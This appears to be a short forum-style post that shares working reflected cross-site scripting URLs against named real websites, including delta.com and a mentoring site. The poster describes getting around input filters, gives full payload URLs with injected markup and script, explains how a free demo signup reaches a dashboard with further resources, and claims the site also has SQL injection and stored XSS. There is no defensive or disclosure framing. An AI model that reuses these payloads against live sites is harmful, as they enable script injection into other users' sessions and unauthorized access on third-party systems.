weird way i had to pull this one off, had some filters
http://www.delta.com/awards/home.do?EventId=%22><br><br><br><br><br><br><marquee><font%20size=200%20color=red>mouse%20over%20the%20input%20box<br></font><input%20value=%22mouse%20over%20here%22%20onmouseover=%22alert(1);%22><a%20href=%22

http://v5.globalmentoring.com/gmsuser/chat.aspx?RoomID=1046&token=test%22);%20alert(1);%20//
also if you register for a free demo here,
http://v5.globalmentoring.com/gmsuser/GMS_marketing/ProductDemo.aspx
you can access other resources via navigating here
http://v5.globalmentoring.com/gmsuser/Dashboard.aspx
site also has sql injections, and profile fields can accept XSS